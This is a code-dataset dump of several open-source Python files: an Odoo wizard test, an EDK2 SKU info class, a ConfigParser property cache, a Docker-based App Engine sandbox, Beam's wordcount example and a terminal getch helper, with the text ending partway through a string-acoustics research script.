repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
open-synergy/event | crm_lead_to_event_registration/tests/test_crm_lead_to_event_registration.py | 1 | 1837 | # -*- coding: utf-8 -*-
# © 2016 Pedro M. Baeza <pedro.baeza@tecnativa.com>
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
from openerp import fields
from openerp.tests import common
class TestCrmLeadToEventRegistration(common.TransactionCase):
def setUp(self):
super(TestCrmLeadToEventRegistration, self).setUp()
self.lead = self.env['crm.lead'].create({
'name': 'Test lead',
'partner_name': 'Test',
})
self.event = self.env['event.event'].create(
{'name': 'Test event',
'date_begin': fields.Date.today(),
'date_end': fields.Date.today()})
self.partner = self.env['res.partner'].create({'name': 'Test partner'})
self.registration = self.env['event.registration'].create(
{'event_id': self.event.id,
'partner_id': self.partner.id})
self.wiz_obj = self.env['crm.lead2opportunity.partner'].with_context(
active_ids=[self.lead.id], active_id=self.lead.id,
active_model='crm.lead')
def test_convert_lead_wo_partner(self):
wizard = self.wiz_obj.create({
'event_id': self.event.id,
'name': 'convert',
'action': 'create',
})
wizard.action_apply()
self.assertTrue(self.event.registration_ids)
self.assertTrue(self.event.registration_ids[0].partner_id)
def test_convert_lead_with_partner(self):
wizard = self.wiz_obj.create({
'event_id': self.event.id,
'name': 'convert',
'action': 'exist',
'partner_id': self.partner.id,
})
wizard.action_apply()
self.assertTrue(self.event.registration_ids)
self.assertEqual(
self.event.registration_ids[0].partner_id, self.partner)
| agpl-3.0 | 3,998,139,696,512,973,300 | 37.25 | 79 | 0.585512 | false |
google/google-ctf | third_party/edk2/BaseTools/Source/Python/CommonDataClass/CommonClass.py | 1 | 4241 | ## @file
# This file is used to define common items of class object
#
# Copyright (c) 2007 - 2018, Intel Corporation. All rights reserved.<BR>
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
## SkuInfoClass
#
# This class defined SkuInfo item used in Module/Platform/Package files
#
# @param object: Inherited from object class
# @param SkuIdName: Input value for SkuIdName, default is ''
# @param SkuId: Input value for SkuId, default is ''
# @param VariableName: Input value for VariableName, default is ''
# @param VariableGuid: Input value for VariableGuid, default is ''
# @param VariableOffset: Input value for VariableOffset, default is ''
# @param HiiDefaultValue: Input value for HiiDefaultValue, default is ''
# @param VpdOffset: Input value for VpdOffset, default is ''
# @param DefaultValue: Input value for DefaultValue, default is ''
#
# @var SkuIdName: To store value for SkuIdName
# @var SkuId: To store value for SkuId
# @var VariableName: To store value for VariableName
# @var VariableGuid: To store value for VariableGuid
# @var VariableOffset: To store value for VariableOffset
# @var HiiDefaultValue: To store value for HiiDefaultValue
# @var VpdOffset: To store value for VpdOffset
# @var DefaultValue: To store value for DefaultValue
#
class SkuInfoClass(object):
def __init__(self, SkuIdName = '', SkuId = '', VariableName = '', VariableGuid = '', VariableOffset = '',
HiiDefaultValue = '', VpdOffset = '', DefaultValue = '', VariableGuidValue = '', VariableAttribute = '', DefaultStore = None):
self.SkuIdName = SkuIdName
self.SkuId = SkuId
#
# Used by Hii
#
if DefaultStore is None:
DefaultStore = {}
self.VariableName = VariableName
self.VariableGuid = VariableGuid
self.VariableGuidValue = VariableGuidValue
self.VariableOffset = VariableOffset
self.HiiDefaultValue = HiiDefaultValue
self.VariableAttribute = VariableAttribute
self.DefaultStoreDict = DefaultStore
#
# Used by Vpd
#
self.VpdOffset = VpdOffset
#
# Used by Default
#
self.DefaultValue = DefaultValue
## Convert the class to a string
#
# Convert each member of the class to string
# Organize to a single line format string
#
# @retval Rtn Formatted String
#
def __str__(self):
Rtn = 'SkuId = ' + str(self.SkuId) + "," + \
'SkuIdName = ' + str(self.SkuIdName) + "," + \
'VariableName = ' + str(self.VariableName) + "," + \
'VariableGuid = ' + str(self.VariableGuid) + "," + \
'VariableOffset = ' + str(self.VariableOffset) + "," + \
'HiiDefaultValue = ' + str(self.HiiDefaultValue) + "," + \
'VpdOffset = ' + str(self.VpdOffset) + "," + \
'DefaultValue = ' + str(self.DefaultValue) + ","
return Rtn
def __deepcopy__(self,memo):
new_sku = SkuInfoClass()
new_sku.SkuIdName = self.SkuIdName
new_sku.SkuId = self.SkuId
new_sku.VariableName = self.VariableName
new_sku.VariableGuid = self.VariableGuid
new_sku.VariableGuidValue = self.VariableGuidValue
new_sku.VariableOffset = self.VariableOffset
new_sku.HiiDefaultValue = self.HiiDefaultValue
new_sku.VariableAttribute = self.VariableAttribute
new_sku.DefaultStoreDict = {key:value for key,value in self.DefaultStoreDict.items()}
new_sku.VpdOffset = self.VpdOffset
new_sku.DefaultValue = self.DefaultValue
return new_sku
| apache-2.0 | -8,464,301,721,770,162,000 | 41.721649 | 143 | 0.620844 | false |
VHAINNOVATIONS/DmD | scrubber/MIST_2_0_4/src/MAT/lib/mat/python/MAT/PropertyCache.py | 1 | 6712 | # Copyright (C) 2007 - 2009 The MITRE Corporation. See the toplevel
# file LICENSE for license terms.
# This is a file-based property cache which I was originally using in
# the experiment engine, but now also in the workspaces.
#
# A property cache
#
# attrTriples is a sequence of triples <attr>, <readFunction>, <writeFunction>
# The read and write functions take the object and the value, and return
# a string (for writing) or an object (for reading). If they're null,
# the literal value is used.
# 11/4/2009: updated the backing store to the ConfigParser module. This
# allows me to have a GLOBALS section, and then subsections for, e.g.,
# MAT engine argument settings.
# So the syntax now permits the value to be a dictionary OF STRINGS,
# in which case
# the attribute is a section name. This can't happen recursively.
# Otherwise, the section name is "GLOBALS". And, the keys will be
# case-insensitive. So in the dictionary children, we have to
# store a couple things, like the actual field name and whether it's
# boolean or not.
from ConfigParser import RawConfigParser, MissingSectionHeaderError
class PropertyCache:
def __init__(self, obj, file, *attrTriples):
self.obj = obj
self.file = file
self.attrTriples = []
self.attrDict = {}
if attrTriples:
self.addAttrTriples(attrTriples)
def addAttrTriples(self, attrTriples):
self.attrTriples += attrTriples
self.attrDict.update(dict([(a[0].lower(), (a[0], a[1], a[2])) for a in attrTriples]))
def save(self):
obj = self.obj
p = RawConfigParser()
p.add_section("_GLOBALS")
for attr, readF, writeF in self.attrTriples:
writeObj = None
if hasattr(obj, attr):
v = getattr(obj, attr)
if v is not None:
if writeF is not None:
writeObj = writeF(obj, v)
elif type(v) is dict:
writeObj = v
else:
writeObj = str(v)
elif writeF is not None:
writeObj = writeF(obj, None)
if writeObj is not None:
if type(writeObj) is dict:
addedSection = False
for k, v in writeObj.items():
if v is None:
continue
if not addedSection:
p.add_section(attr)
p.add_section("_METADATA " + attr)
addedSection = True
# Let's record the type. Let's allow
# strings, booleans, ints, floats.
# For backward compatibility, "no"
# means string, "yes" means boolean
# when we read.
if type(v) in (bool, str, int, float):
tString = type(v).__name__
v = str(v)
else:
raise TypeError, "dictionary value must be ASCII string, float, boolean or integer"
p.set(attr, k, v)
p.set("_METADATA " + attr, k, tString + " " + k)
else:
p.set("_GLOBALS", attr, writeObj)
fp = open(self.file, "w")
p.write(fp)
fp.close()
def load(self):
obj = self.obj
p = RawConfigParser()
try:
p.read([self.file])
except MissingSectionHeaderError:
# Oops, probably the old file format.
self._loadv1()
return
lvPairs = []
metadata = {}
dictDigesters = {"str": lambda x: x,
"no": lambda x: x,
"int": int,
"float": float,
"yes": lambda x: x == "True",
"bool": lambda x: x == "True"}
for sect in p.sections():
opts = p.options(sect)
if sect == "_GLOBALS":
for lab in opts:
val = p.get(sect, lab)
lvPairs.append((lab, val))
elif sect.startswith("_METADATA "):
attrName = sect[10:]
localMdata = {}
for lab in opts:
val = p.get(sect, lab)
# Let's record the type. Let's allow
# strings, booleans, ints, floats.
# For backward compatibility, "no"
# means string, "yes" means boolean
# when we read.
toks = val.split(None, 1)
if len(toks) == 2:
localMdata[lab] = (dictDigesters[toks[0]], toks[1])
metadata[attrName] = localMdata
else:
# Construct a dictionary.
d = {}
for lab in opts:
d[lab] = p.get(sect, lab)
lvPairs.append((sect, d))
for lab, val in lvPairs:
if metadata.has_key(lab):
for k, (digester, trueK) in metadata[lab].items():
v = val[k]
del val[k]
val[trueK] = digester(v)
if self.attrDict.has_key(lab):
attrName, readF, writeF = self.attrDict[lab]
if readF is not None:
readObj = readF(obj, val)
else:
readObj = val
if readObj is not None:
setattr(obj, attrName, readObj)
# For the 1.0 property cache file format.
# First, we have to turn the dictionary into something
# useful. The 1.0 version didn't have to worry about
# the case insensitivity issue.
def _loadv1(self):
obj = self.obj
attrDict = dict([(attrName, (readF, writeF)) for attrName, readF, writeF
in self.attrDict.values()])
fp = open(self.file, "r")
for line in fp.readlines():
toks = line.strip().split(" : ", 1)
if len(toks) == 2:
[lab, val] = toks
if attrDict.has_key(lab):
readF, writeF = attrDict[lab]
if readF is not None:
readObj = readF(obj, val)
else:
readObj = val
if readObj is not None:
setattr(obj, lab, readObj)
fp.close()
| apache-2.0 | 586,704,132,469,674,100 | 38.482353 | 111 | 0.476162 | false |
ajessup/appstart | appstart/sandbox/container_sandbox.py | 1 | 23266 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A ContainerSandbox manages the application and devappserver containers.
This includes their creation, termination, and destruction.
ContainerSandbox is intended to be used inside a "with" statement. Inside
the interior of the "with" statement, the user interact with the containers
via the docker api. It may also be beneficial for the user to perform
system tests in this manner.
"""
# This file conforms to the external style guide
# pylint: disable=bad-indentation, g-bad-import-order
import io
import os
import sys
import time
import docker
import configuration
import container
from .. import utils
from .. import constants
from ..utils import get_logger
# Maximum attempts to health check application container.
MAX_ATTEMPTS = 30
# Default port that the application is expected to listen on inside
# the application container.
DEFAULT_APPLICATION_PORT = 8080
# Time format for naming images/containers
TIME_FMT = '%Y.%m.%d_%H.%M.%S'
# Java offset for the xml file's location, relative to the root
# diretory of the WAR archive
JAVA_OFFSET = 'WEB-INF/'
class ContainerSandbox(object):
"""Sandbox to manage the user application & devappserver containers.
This sandbox aims to leave the docker container space untouched.
Proper usage ensures that application & devappserver containers will
be created, started, stopped, and destroyed. For proper usage, the
ContainerSandbox should be used as a context manager (inside a "with"
statement), or the start and stop functions should be invoked from
within a try-finally context.
"""
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-arguments
def __init__(self,
config_file=None,
image_name=None,
application_id=None,
application_port=8080,
admin_port=8000,
clear_datastore=False,
internal_admin_port=32768,
internal_api_port=32769,
internal_proxy_port=32770,
log_path=None,
run_api_server=True,
storage_path='/tmp/app_engine/storage',
nocache=False,
timeout=MAX_ATTEMPTS,
force_version=False):
"""Get the sandbox ready to construct and run the containers.
Args:
config_file: (basestring or None) The relative or full path
to the config_file of the application. At least one of
image_name and config_file must be specified. If image_name is
not specified, this path will be used to help find the
Dockerfile and build the application container.
Therefore, if image_name is not specified, there should
be a Dockerfile in the correct location:
Non-java apps (apps that use .yaml files)
1) The .yaml file must be in the root of the app
directory.
2) The Dockerfile must be in the root of the app
directory.
Java apps (apps that are built off java-compat):
1) The appengine-web.xml file must be in
<root>/WEB-INF/ (where <root> is the root
directory of the WAR archive.)
2) The Dockerfile must be in the root of the WAR
archive.
3) There must be a web.xml file in the same
directory as the appengine-web.xml file.
image_name: (basestring or None) If specified, the sandbox
will run the image associated with image_name instead of
building an image from the specified application_directory.
application_id: (basestring) The application ID is
the unique "appengine application ID" that the app is
identified by, and can be found in the developer's
console. While for deployment purposes, this ID is
important, it's not as important in development. This
ID only controls which datastore, blobstore, etc the
sandbox will use. If the sandbox is run consecutively
with the same application_id, (and of course, the same
storage_path) the datastore, blobstore, taskqueue, etc
will persist assuming their data has not been deleted.
application_port: (int) The port on the docker host that should be
mapped to the application. The application will be
accessible through this port.
admin_port: (int) The port on the docker server host that
should be mapped to the admin server, which runs inside
the devappserver container. The admin panel will be
accessible through this port.
clear_datastore: (bool) Whether or not to clear the datastore.
If True, this eliminates all of the data from the datastore
before running the api server.
internal_admin_port: (int) The port INSIDE the devappserver
container that the admin panel binds to. Because this
is internal to the container, it can be defaulted.
In fact, you shouldn't change it from the default unless
you have a reason to.
internal_api_port: (int) The port INSIDE the devappserver
container that the api server should bind to.
~Same disclaimer as the one for internal_admin_port.~
internal_proxy_port: (int) The port INSIDE the devappserver
container that the proxy should bind to.
~Same disclaimer as the one for internal_admin_port.~
log_path: (basestring or None) The path where the application's
logs should be collected. Note that the application's logs
will be collected EXTERNALLY (ie they will collect in the
docker host's file system) and log_path specifies where
these logs should go. If log_path is None, a timestamped
name will be generated for the log directory.
run_api_server: (bool) Whether or not to run the api server.
If this argument is set to false, the sandbox won't start
a devappserver.
storage_path: (basestring) The path (external to the
containers) where the data associated with the api
server's services - datastore, blobstore, etc - should
collect. Note that this path defaults to
/tmp/appengine/storage, so it should be changed if the data
is intended to persist.
nocache: (bool) Whether or not to use the cache when building
images.
timeout: (int) How many seconds to wait for the application
container to start.
force_version: (bool) Whether or not to continue in the case
of mismatched docker versions.
"""
self.cur_time = time.strftime(TIME_FMT)
self.app_id = (application_id or
time.strftime('%s'))
self.internal_api_port = internal_api_port
self.internal_proxy_port = internal_proxy_port
self.internal_admin_port = internal_admin_port
self.clear_datastore = clear_datastore
self.port = application_port
self.storage_path = storage_path
self.log_path = (
log_path or self.make_timestamped_name(
'/tmp/log/app_engine/app_logs',
self.cur_time))
self.image_name = image_name
self.admin_port = admin_port
self.dclient = utils.get_docker_client()
self.devappserver_container = None
self.app_container = None
self.pinger_container = None
self.nocache = nocache
self.run_devappserver = run_api_server
self.timeout = timeout
if config_file:
self.conf_path = os.path.abspath(config_file)
else:
if not image_name:
raise utils.AppstartAbort('At least one of config_file and '
'image_name must be specified.')
self.conf_path = os.path.join(os.path.dirname(__file__),
'app.yaml')
self.application_configuration = (
configuration.ApplicationConfiguration(self.conf_path))
self.app_dir = self.app_directory_from_config(self.conf_path)
# For Java apps, the xml file must be offset by WEB-INF.
# Otherwise, devappserver will think that it's a non-java app.
self.das_offset = (JAVA_OFFSET if
self.application_configuration.is_java else '')
if not force_version:
utils.check_docker_version(self.dclient)
def __enter__(self):
self.start()
return self
def start(self):
"""Start the sandbox."""
try:
self.create_and_run_containers()
except: # pylint: disable=bare-except
self.stop()
raise
def create_and_run_containers(self):
"""Creates and runs app and (optionally) devappserver containers.
This includes the creation of a new devappserver image, unless
self.run_devappserver is False. If image_name isn't specified, an
image is created for the application as well. Newly made containers
are cleaned up, but newly made images are not.
"""
if self.run_devappserver:
# Devappserver must know APP_ID to properly interface with
# services like datastore, blobstore, etc. It also needs
# to know where to find the config file, which port to
# run the proxy on, and which port to run the api server on.
das_env = {'APP_ID': self.app_id,
'CLEAR_DATASTORE': self.clear_datastore,
'PROXY_PORT': self.internal_proxy_port,
'API_PORT': self.internal_api_port,
'ADMIN_PORT': self.internal_admin_port,
'CONFIG_FILE': os.path.join(
self.das_offset,
os.path.basename(self.conf_path))}
devappserver_image = self.build_devappserver_image()
devappserver_container_name = (
self.make_timestamped_name('devappserver',
self.cur_time))
# The host_config specifies port bindings and volume bindings.
# /storage is bound to the storage_path. Internally, the
# devappserver writes all the db files to /storage. The mapping
# thus allows these files to appear on the host machine. As for
# port mappings, we only want to expose the application (via the
# proxy), and the admin panel.
devappserver_hconf = docker.utils.create_host_config(
port_bindings={
DEFAULT_APPLICATION_PORT: self.port,
self.internal_admin_port: self.admin_port,
},
binds={
self.storage_path: {'bind': '/storage'},
}
)
self.devappserver_container = container.Container(self.dclient)
self.devappserver_container.create(
name=devappserver_container_name,
image=devappserver_image,
ports=[DEFAULT_APPLICATION_PORT, self.internal_admin_port],
volumes=['/storage'],
host_config=devappserver_hconf,
environment=das_env)
self.devappserver_container.start()
get_logger().info('Starting container: %s',
devappserver_container_name)
# The application container needs several environment variables
# in order to start up the application properly, as well as
# look for the api server in the correct place. Notes:
#
# GAE_PARTITION is always dev for development modules.
# GAE_LONG_APP_ID is the "application ID". When devappserver
# is invoked, it can be passed a "--application" flag. This
# application must be consistent with GAE_LONG_APP_ID.
# API_HOST is 0.0.0.0 because application container runs on the
# same network stack as devappserver.
# MODULE_YAML_PATH specifies the path to the app from the
# app directory
# TODO (find in g3 and link to here via comment)
app_env = {'API_HOST': '0.0.0.0',
'API_PORT': self.internal_api_port,
'GAE_LONG_APP_ID': self.app_id,
'GAE_PARTITION': 'dev',
'GAE_MODULE_INSTANCE': '0',
'MODULE_YAML_PATH': os.path.basename(self.conf_path),
'GAE_MODULE_NAME': 'default', # TODO(gouzenko) parse app.yaml
'GAE_MODULE_VERSION': '1',
'GAE_SERVER_PORT': '8080',
'USE_MVM_AGENT': 'true'}
# Build from the application directory iff image_name is not
# specified.
app_image = self.image_name or self.build_app_image()
app_container_name = self.make_timestamped_name('test_app',
self.cur_time)
# If devappserver is running, hook up the app to it.
if self.run_devappserver:
network_mode = ('container:%s' %
self.devappserver_container.get_id())
ports = port_bindings = None
else:
port_bindings = {DEFAULT_APPLICATION_PORT: self.port}
ports = [DEFAULT_APPLICATION_PORT]
network_mode = None
app_hconf = docker.utils.create_host_config(
port_bindings=port_bindings,
binds={
self.log_path: {'bind': '/var/log/app_engine'}
},
)
self.app_container = container.ApplicationContainer(
self.application_configuration,
self.dclient)
self.app_container.create(
name=app_container_name,
image=app_image,
ports=ports,
volumes=['/var/log/app_engine'],
host_config=app_hconf,
environment=app_env)
# Start as a shared network container, putting the application
# on devappserver's network stack. (If devappserver is not
# running, network_mode is None).
try:
self.app_container.start(network_mode=network_mode)
except utils.AppstartAbort:
if self.run_devappserver:
self.abort_if_not_running(self.devappserver_container)
raise
# Construct a pinger container and bind it to the application's network
# stack. This will allow the pinger to attempt to connect to the
# application's ports.
pinger_name = self.make_timestamped_name('pinger', self.cur_time)
self.pinger_container = container.PingerContainer(self.dclient)
try:
self.pinger_container.create(name=pinger_name,
image=constants.PINGER_IMAGE)
except utils.AppstartAbort:
if not utils.find_image(constants.PINGER_IMAGE):
raise utils.AppstartAbort('No pinger image found. '
'Did you forget to run "appstart '
'init"? ')
raise
try:
self.pinger_container.start(
network_mode='container:{}'.format(self.app_container.get_id()))
except utils.AppstartAbort:
self.abort_if_not_running(self.app_container)
raise
self.wait_for_start()
self.app_container.stream_logs()
def stop(self):
"""Remove containers to clean up the environment."""
self.stop_and_remove_containers()
@staticmethod
def abort_if_not_running(cont):
if not cont.running():
cont.stream_logs(stream=False)
raise utils.AppstartAbort('{0} stopped '
'prematurely'.format(cont.name))
def __exit__(self, etype, value, traceback):
self.stop()
def stop_and_remove_containers(self):
"""Stop and remove application containers."""
containers_to_remove = [self.app_container,
self.devappserver_container,
self.pinger_container]
for cont in containers_to_remove:
if cont and cont.running():
cont_id = cont.get_id()
get_logger().info('Stopping %s', cont_id)
cont.kill()
get_logger().info('Removing %s', cont_id)
cont.remove()
def wait_for_start(self):
"""Wait for the app container to start.
Raises:
utils.AppstartAbort: If the application server doesn't
start after timeout reach it on 8080.
"""
host = self.app_container.host
get_logger().info('Waiting for application to listen on port 8080')
attempt = 1
graphical = sys.stdout.isatty()
def print_if_graphical(message):
if graphical:
sys.stdout.write(message)
sys.stdout.flush()
def exit_loop_with_error(error):
print_if_graphical('\n')
raise utils.AppstartAbort(error)
print_if_graphical('Waiting ')
while True:
if attempt > self.timeout:
exit_loop_with_error('The application server timed out.')
if self.run_devappserver:
self.abort_if_not_running(self.devappserver_container)
self.abort_if_not_running(self.app_container)
if attempt % 4 == 0:
# \033[3D moves the cursor left 3 times. \033[K clears to the
# end of the line. So, every 4th ping, clear the dots.
print_if_graphical('\033[3D\033[K')
else:
print_if_graphical('.')
if self.pinger_container.ping_application_container():
print_if_graphical('\n')
break
attempt += 1
time.sleep(1)
get_logger().info('Your application is live. '
'Access it at: {0}:{1}'.format(host, str(self.port)))
@staticmethod
def app_directory_from_config(full_config_file_path):
"""Get the application root directory based on the config file.
Args:
full_config_file_path: (basestring) The absolute path to a
config file.
Returns:
(basestring): The application's root directory.
"""
conf_file_dir = os.path.dirname(full_config_file_path)
if full_config_file_path.endswith('.yaml'):
return conf_file_dir
else:
return os.path.dirname(conf_file_dir)
def build_app_image(self):
"""Build the app image from the Dockerfile in the root directory.
Returns:
(basestring) The name of the new app image.
"""
name = self.make_timestamped_name('app_image', self.cur_time)
utils.build_from_directory(self.app_dir, name)
return name
def build_devappserver_image(self):
"""Build a layer over devappserver to include application files.
The new image contains the user's config files.
Returns:
(basestring) The name of the new devappserver image.
"""
# Collect the files that should be added to the docker build
# context.
files_to_add = {self.conf_path: None}
if self.application_configuration.is_java:
files_to_add[self.get_web_xml(self.conf_path)] = None
# The Dockerfile should add the config files to
# the /app folder in devappserver's container.
dockerfile = """
FROM %(das_repo)s
ADD %(path)s/* %(dest)s
""" %{'das_repo': constants.DEVAPPSERVER_IMAGE,
'path': os.path.dirname(self.conf_path),
'dest': os.path.join('/app', self.das_offset)}
# Construct a file-like object from the Dockerfile.
dockerfile_obj = io.BytesIO(dockerfile.encode('utf-8'))
build_context = utils.make_tar_build_context(dockerfile_obj,
files_to_add)
image_name = self.make_timestamped_name('devappserver_image',
self.cur_time)
# Build the devappserver image.
res = self.dclient.build(fileobj=build_context,
custom_context=True,
rm=True,
nocache=self.nocache,
tag=image_name)
# Log the output of the build.
try:
utils.log_and_check_build_results(res, image_name)
except utils.AppstartAbort:
if not utils.find_image(constants.DEVAPPSERVER_IMAGE):
raise utils.AppstartAbort('No devappserver base image found. '
'Did you forget to run "appstart '
'init"?')
raise
return image_name
@staticmethod
def get_web_xml(full_config_file_path):
"""Get (what should be) the path of the web.xml file.
Args:
full_config_file_path: (basestring) The absolute path to a
.xml config file.
Returns:
(basestring) The full path to the web.xml file.
"""
return os.path.join(os.path.dirname(full_config_file_path),
'web.xml')
@staticmethod
def make_timestamped_name(base, time_str):
"""Construct a name for an image or container.
Note that naming is functionally unimportant and
serves only to make the output of 'docker images'
and 'docker ps' look cleaner.
Args:
base: (basestring) The prefix of the name.
time_str: (basestring) The name's timestamp.
Returns:
(basestring) The name of the image or container.
"""
return '%s.%s' % (base, time_str)
| apache-2.0 | 8,048,079,043,332,018,000 | 41.072333 | 81 | 0.57887 | false |
RyanSkraba/beam | sdks/python/apache_beam/examples/wordcount.py | 1 | 5161 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A word-counting workflow."""
from __future__ import absolute_import
import argparse
import logging
import re
from past.builtins import unicode
import apache_beam as beam
from apache_beam.io import ReadFromText
from apache_beam.io import WriteToText
from apache_beam.metrics import Metrics
from apache_beam.metrics.metric import MetricsFilter
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.options.pipeline_options import SetupOptions
class WordExtractingDoFn(beam.DoFn):
"""Parse each line of input text into words."""
def __init__(self):
# TODO(BEAM-6158): Revert the workaround once we can pickle super() on py3.
# super(WordExtractingDoFn, self).__init__()
beam.DoFn.__init__(self)
self.words_counter = Metrics.counter(self.__class__, 'words')
self.word_lengths_counter = Metrics.counter(self.__class__, 'word_lengths')
self.word_lengths_dist = Metrics.distribution(
self.__class__, 'word_len_dist')
self.empty_line_counter = Metrics.counter(self.__class__, 'empty_lines')
def process(self, element):
"""Returns an iterator over the words of this element.
The element is a line of text. If the line is blank, note that, too.
Args:
element: the element being processed
Returns:
The processed element.
"""
text_line = element.strip()
if not text_line:
self.empty_line_counter.inc(1)
words = re.findall(r'[\w\']+', text_line, re.UNICODE)
for w in words:
self.words_counter.inc()
self.word_lengths_counter.inc(len(w))
self.word_lengths_dist.update(len(w))
return words
def run(argv=None, save_main_session=True):
"""Main entry point; defines and runs the wordcount pipeline."""
parser = argparse.ArgumentParser()
parser.add_argument('--input',
dest='input',
default='gs://dataflow-samples/shakespeare/kinglear.txt',
help='Input file to process.')
parser.add_argument('--output',
dest='output',
required=True,
help='Output file to write results to.')
known_args, pipeline_args = parser.parse_known_args(argv)
# We use the save_main_session option because one or more DoFn's in this
# workflow rely on global context (e.g., a module imported at module level).
pipeline_options = PipelineOptions(pipeline_args)
pipeline_options.view_as(SetupOptions).save_main_session = save_main_session
p = beam.Pipeline(options=pipeline_options)
# Read the text file[pattern] into a PCollection.
lines = p | 'read' >> ReadFromText(known_args.input)
# Count the occurrences of each word.
def count_ones(word_ones):
(word, ones) = word_ones
return (word, sum(ones))
counts = (lines
| 'split' >> (beam.ParDo(WordExtractingDoFn())
.with_output_types(unicode))
| 'pair_with_one' >> beam.Map(lambda x: (x, 1))
| 'group' >> beam.GroupByKey()
| 'count' >> beam.Map(count_ones))
# Format the counts into a PCollection of strings.
def format_result(word_count):
(word, count) = word_count
return '%s: %d' % (word, count)
output = counts | 'format' >> beam.Map(format_result)
# Write the output using a "Write" transform that has side effects.
# pylint: disable=expression-not-assigned
output | 'write' >> WriteToText(known_args.output)
result = p.run()
result.wait_until_finish()
# Do not query metrics when creating a template which doesn't run
if (not hasattr(result, 'has_job') # direct runner
or result.has_job): # not just a template creation
empty_lines_filter = MetricsFilter().with_name('empty_lines')
query_result = result.metrics().query(empty_lines_filter)
if query_result['counters']:
empty_lines_counter = query_result['counters'][0]
logging.info('number of empty lines: %d', empty_lines_counter.result)
word_lengths_filter = MetricsFilter().with_name('word_len_dist')
query_result = result.metrics().query(word_lengths_filter)
if query_result['distributions']:
word_lengths_dist = query_result['distributions'][0]
logging.info('average word length: %d', word_lengths_dist.result.mean)
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
run()
| apache-2.0 | 626,437,405,938,748,800 | 36.398551 | 79 | 0.679132 | false |
Spacecraft-Code/SPELL | src/spell/spell/utils/getch.py | 1 | 3563 | ###################################################################################
## MODULE : spell.utils.getch
## DATE : Mar 18, 2011
## PROJECT : SPELL
## DESCRIPTION: Getchar implementation
## --------------------------------------------------------------------------------
##
## Copyright (C) 2008, 2015 SES ENGINEERING, Luxembourg S.A.R.L.
##
## This file is part of SPELL.
##
## This component is free software: you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation, either version 3 of the License, or
## (at your option) any later version.
##
## This software is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with SPELL. If not, see <http://www.gnu.org/licenses/>.
##
###################################################################################
import sys
UP = '-up-'
DOWN = '-down-'
LEFT = '-left-'
RIGHT = '-right-'
ESC = '-esc-'
ENTER = '-enter-'
TAB = '-tab-'
################################################################################
class _Getch:
"""
Gets a single character from standard input. Does not echo to the
screen.
"""
def __init__(self):
try:
self.impl = _GetchWindows()
except ImportError:
self.impl = _GetchUnix()
def __call__(self): return self.impl()
################################################################################
class _GetchCommon:
scanCode = False
def echo(self, ch):
o = ord(ch)
if self.scanCode:
if o==75:
result = LEFT
elif o==77:
result = RIGHT
elif o==72:
result = UP
elif o==80:
result = DOWN
else:
result = ch
else:
if o==13 or o==10:
sys.stdout.write('\n')
result = ENTER
elif o==9:
sys.stdout.write('\t')
result = TAB
elif o==27:
result = ESC
else:
sys.stdout.write(ch)
result = ch
self.scanCode = False
return result
################################################################################
class _GetchUnix(_GetchCommon):
def __init__(self):
import tty, sys
def __call__(self):
import sys, tty, termios
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
o = ord(ch)
if (o == 0) or (o == 224):
self.scanCode = True
ch = sys.stdin.read(1)
ch = self.echo(ch)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
################################################################################
class _GetchWindows(_GetchCommon):
def __init__(self):
import msvcrt
def __call__(self):
import msvcrt
ch = msvcrt.getch()
o = ord(ch)
if (o == 0) or (o == 224):
self.scanCode = True
ch = msvcrt.getch()
ch = self.echo(ch)
return ch
getch = _Getch() | lgpl-3.0 | 2,679,316,217,137,369,000 | 28.213115 | 84 | 0.442885 | false |
gperciva/artifastring | research/mode-detect/short.py | 1 | 2790 | #!/usr/bin/env python
import sys
sys.path.append("../shared/")
import os
import harmonics_data
import sys
import mode_decays
import published_constants
import adjust_decays
import tables
# no clue why I need this. :(
from harmonics_data import HarmonicsStats
def process(dirname, basename, recalc=False, plot=False):
inst = basename.split('-')[0]
st = basename.split('-')[1]
pc = published_constants.PHYSICAL_CONSTANT_RANGES[inst]
# find average tension, length
T = ( pc[st.upper()]['T'][0] + pc[st.upper()]['T'][1] ) / 2
